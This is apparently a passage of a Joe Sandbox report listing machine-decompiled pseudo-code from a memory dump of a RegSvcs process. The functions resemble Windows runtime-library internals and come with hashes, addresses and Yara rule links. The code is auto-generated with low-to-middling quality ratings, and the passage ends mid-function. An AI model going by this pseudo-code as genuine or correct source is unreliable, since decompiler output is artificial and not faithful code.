Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: 5D31D2326047069BC719EF28CC90A6BB7AAFFC0710F04492DF55B87641DE30E909CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 019469A6 Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E019469A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x19bd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L018D6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01946BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E01909980() >= 0) {
							E018E2280(_t56, 0x19b8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x19b8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x19b8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E018CB6F0(0x18ac338, 0x18ac288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E01909520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E019095D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E018DFFB0(_t68, _t77, 0x19b8778);
				}
				_pop(_t78);
				return E0190B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x019469b5
0x019469be
0x019469c3
0x019469c9
0x019469cc
0x019469d1
0x019469d3
0x019469de
0x019469e1
0x019469ea
0x019469f6
0x019469fe
0x01946a13
0x01946a14
0x01946a15
0x01946a16
0x01946a1e
0x01946a26
0x01946a31
0x01946a36
0x01946a37
0x01946a40
0x01946a49
0x01946a4a
0x01946a53
0x01946a59
0x01946a5d
0x01946a5e
0x01946a64
0x01946a67
0x01946a6a
0x01946a6d
0x01946a70
0x01946a77
0x01946a7d
0x01946a86
0x01946a89
0x01946a9c
0x01946a9f
0x01946aa2
0x01946aa5
0x01946aaf
0x01946ab1
0x01946ab8
0x01946ab9
0x01946abb
0x01946abe
0x01946ac5
0x01946ac5
0x01946aaf
0x01946a40
0x01946a26
0x019469fe
0x01946ace
0x01946ad0
0x01946ad3
0x01946ad8
0x01946adf
0x01946adf
0x01946ae8
0x01946aef
0x01946aef
0x01946af9
0x01946b06

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 688acec2bb07462e48c39d5fb81c69157bb779262d911f834f9033503f1b3373
Instruction ID: e7348b18aab2acefcbf94ccf8508ecb0f7c42e97e6c08eebc5dbd430e8347ab4
Opcode Fuzzy Hash: 688acec2bb07462e48c39d5fb81c69157bb779262d911f834f9033503f1b3373
Instruction Fuzzy Hash: 7D4191B1D007099FDB25CFAAC980BFEBBF8EF49714F14812AE918A7240DB709905CB51

Uniqueness

Uniqueness Score: -1.00%

Function 018C5210 Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E018C5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E018C52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E019095D0();
							L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E018DEB70(_t54, 0x19b79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E019095D0();
								L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E018DEB70(_t54, 0x19b79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0190F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E018DEB70(_t54, 0x19b79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E019095D0();
							L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x018c5220
0x018c5224
0x01920d13
0x01920d16
0x01920d19
0x018c522a
0x018c522a
0x018c522d
0x018c522d
0x018c5231
0x018c5235
0x018c5239
0x01920d5c
0x01920d62
0x00000000
0x00000000
0x01920d6a
0x01920d7b
0x01920d7f
0x01920d81
0x01920d84
0x01920d95
0x01920d95
0x01920d6c
0x01920d71
0x01920d71
0x01920d9a
0x00000000
0x018c524a
0x018c524a
0x018c5250
0x01920d24
0x01920d35
0x01920d39
0x01920d3b
0x01920d3e
0x01920d50
0x01920d50
0x01920d26
0x01920d2b
0x01920d2b
0x00000000
0x01920d55
0x018c5256
0x018c525b
0x018c5265
0x01920da7
0x018c526b
0x018c526e
0x018c5272
0x01920db1
0x01920db4
0x01920dc5
0x01920dc5
0x018c5272
0x018c5278
0x018c527e
0x018c528a
0x018c528c
0x018c528d
0x00000000
0x018c5280
0x018c5282
0x018c5288
0x018c529f
0x018c5292
0x00000000
0x018c5292
0x00000000
0x018c5288
0x018c527e

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4447a6c3a177083197750e3062e93450fa9a4178fa1c07fd04a9e6a0ec75e536
Instruction ID: 7a0caf537e11418dc81c103d6fbd77f7853b4df9c95cd55f9c9a6d16d858a737
Opcode Fuzzy Hash: 4447a6c3a177083197750e3062e93450fa9a4178fa1c07fd04a9e6a0ec75e536
Instruction Fuzzy Hash: 8C3113316427159FCB26AB1CC880B6A7BAAFF50B61F144619F81D8B1E5D730FA00C691

Uniqueness

Uniqueness Score: -1.00%

Function 01903D43 Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01903D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E018D7B60(0, _t61, 0x18a11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E018D7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L018E4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x01903d4c
0x01903d50
0x01903d55
0x01903d5e
0x0193e79a
0x00000000
0x0193e79a
0x01903d68
0x0193e789
0x01903d9d
0x01903da3
0x01903daf
0x01903db5
0x01903dbc
0x01903dc4
0x01903dc9
0x01903dce
0x0193e7ae
0x0193e7ae
0x01903dde
0x01903de2
0x01903de7
0x01903e0d
0x01903e13
0x01903e16
0x01903e1e
0x01903e25
0x01903e28
0x00000000
0x00000000
0x01903e2a
0x01903e2f
0x01903e37
0x01903e37
0x00000000
0x01903e37
0x01903e31
0x00000000
0x01903e31
0x01903e20
0x01903e20
0x01903e35
0x00000000
0x01903de9
0x01903de9
0x01903de9
0x01903dee
0x01903dfd
0x01903dff
0x01903e02
0x01903e05
0x01903e05
0x00000000
0x01903df0
0x01903de7
0x0193e78f
0x0193e794
0x01903d79
0x01903d84
0x01903d89
0x01903d8e
0x00000000
0x0193e7a4
0x01903d96
0x01903d9a
0x00000000
0x01903d9a
0x00000000
0x0193e794
0x01903d6e
0x01903d73
0x00000000
0x0193e7b5
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89ed9e1595eca3ef1888e959512faa20408aaf4e49908c63b8fe514a09f76884
Instruction ID: 2b42945c1ae6e36af8b723184b7ea797d3b8ece3cf6733d10599f7e16c129a02
Opcode Fuzzy Hash: 89ed9e1595eca3ef1888e959512faa20408aaf4e49908c63b8fe514a09f76884
Instruction Fuzzy Hash: 5C319C31A05615DFD7268F2EC841A6ABBE9FF85711B05846AE94ECB390E730EA40C791

Uniqueness

Uniqueness Score: -1.00%

Function 018FA61C Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E018FA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x19a0220);
				E0191D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x19b7b9c; // 0x0
				_t55 = L018E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0191D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x19b7b10 =  *0x19b7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x19b536c; // 0x77575368
					if( *_t51 != 0x19b5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x19b5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x19b536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E018FA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x018fa61c
0x018fa61e
0x018fa623
0x018fa628
0x018fa62b
0x018fa62d
0x018fa648
0x018fa64a
0x018fa64f
0x01939b44
0x018fa6ec
0x018fa6f1
0x018fa6f1
0x018fa655
0x018fa657
0x018fa65a
0x018fa65d
0x018fa662
0x018fa663
0x018fa667
0x018fa668
0x018fa66d
0x018fa706
0x018fa706
0x01939bda
0x01939be6
0x01939beb
0x00000000
0x01939beb
0x018fa679
0x01939b7a
0x00000000
0x01939b7a
0x018fa683
0x018fa6f4
0x018fa6f7
0x018fa6f9
0x018fa6fd
0x018fa6a0
0x018fa6a0
0x018fa6ad
0x018fa6af
0x018fa6b4
0x01939ba7
0x01939bac
0x00000000
0x00000000
0x01939bc6
0x01939bce
0x01939bd1
0x01939bd3
0x01939bd3
0x00000000
0x01939bd1
0x018fa6bd
0x018fa6c3
0x018fa6c6
0x018fa6d2
0x018fa701
0x018fa704
0x00000000
0x018fa704
0x018fa6d4
0x018fa6d6
0x018fa6d9
0x018fa6db
0x018fa6e1
0x018fa6e6
0x018fa6e8
0x018fa6e8
0x018fa6ea
0x00000000
0x018fa6ea
0x018fa688
0x018fa692
0x018fa694
0x018fa699
0x00000000
0x00000000
0x018fa69d
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c827b049ea9f36f0432c423ea752046224843c41e1128a8b3195609553df6cd
Instruction ID: d7d92f077bf35a93d3267e7cb8813065391da7efe487df6711979307ac53bfba
Opcode Fuzzy Hash: 0c827b049ea9f36f0432c423ea752046224843c41e1128a8b3195609553df6cd
Instruction Fuzzy Hash: DD417B75A04209DFDB19CF58C580BA9BBF1BF89314F19816DEA09EB344C774AA41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 018EC182 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E018EC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E018E7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01998D34(_v8, _t80);
					}
					E018E2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E018DFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01998833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E018DFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0190B180();
						if(_a4 != 0) {
							E018E2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E018EBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E018EBB2D(_t16, _t15);
						E018EB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E018DFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E018DFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E018DFFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x018ec18d
0x018ec18f
0x018ec191
0x018ec19b
0x018ec1a0
0x018ec1d4
0x018ec1de
0x01932d6e
0x018ec1e4
0x018ec1e4
0x018ec1e4
0x018ec1ec
0x01932d7d
0x01932d7d
0x018ec1f3
0x018ec1ff
0x01932d88
0x01932d8d
0x01932d94
0x01932d94
0x01932d9f
0x01932da4
0x01932dab
0x01932db0
0x01932db2
0x01932db3
0x01932db4
0x01932dbc
0x01932dc3
0x01932dc3
0x018ec205
0x018ec205
0x018ec208
0x018ec20e
0x018ec211
0x018ec216
0x018ec219
0x018ec21f
0x018ec222
0x018ec22c
0x018ec234
0x018ec23a
0x018ec23f
0x018ec245
0x018ec24b
0x018ec251
0x018ec25a
0x018ec276
0x018ec27d
0x018ec27d
0x018ec25c
0x018ec25c
0x00000000
0x018ec25e
0x018ec1a4
0x018ec1aa
0x018ec1b3
0x018ec265
0x018ec26c
0x018ec26c
0x00000000

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 8b3768614c9832c953ae67047ac0cdbd6557982e48b0e044045b219cdb3aeb17
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: 9631F672A0164BAEDB05EBB8C484BE9FB98BF53304F08415AD51CD7201DB349B46D7E2

Uniqueness

Uniqueness Score: -1.00%

Function 01947016 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E01947016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x19bd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E01946B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01946B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E018E7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E01909AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0190B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L018E4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x01947016
0x0194701e
0x0194702b
0x01947033
0x01947037
0x0194703c
0x0194703e
0x01947041
0x01947045
0x0194704a
0x01947050
0x01947055
0x0194705a
0x01947062
0x01947062
0x0194705a
0x01947064
0x01947064
0x01947067
0x01947071
0x01947096
0x0194709b
0x019470a2
0x019470a6
0x019470a7
0x019470ad
0x019470b3
0x019470b6
0x019470bb
0x019470c3
0x019470c3
0x019470c6
0x019470cd
0x019470dd
0x019470e0
0x019470e2
0x019470e2
0x019470ee
0x01947101
0x019470f0
0x019470f9
0x019470f9
0x0194710a
0x0194710e
0x01947112
0x01947117
0x01947118
0x01947118
0x019470bb
0x0194711d
0x01947123
0x01947131
0x01947131
0x01947136
0x0194713d
0x0194713e
0x0194713f
0x0194714a
0x0194714a
0x01947084
0x01947088
0x00000000
0x0194708e
0x0194708e
0x01947092
0x00000000
0x01947092

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 168ce9dc966df293e73669c8239ab0d5a216b77a57988c7d325cc3dfc60fd852
Instruction ID: 2301511c7e79865c00271e0d0470d8943762702ec58bff3a22a9a5b1162ccedb
Opcode Fuzzy Hash: 168ce9dc966df293e73669c8239ab0d5a216b77a57988c7d325cc3dfc60fd852
Instruction Fuzzy Hash: 1D31D3726087859FD325DF6CC840E6AB7E9FFC8700F044A29F99987690E730E904C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 018FA70E Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E018FA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x19b7b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x19b7b10 = 8;
					 *0x19b7b14 = 0x19b7b0c;
					 *0x19b7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E018FA990(0x19b7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L018FA840(__edx, __ecx, __ecx, _t52, 0x19b7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x19b7b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x19b7b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x19b7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L018E4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
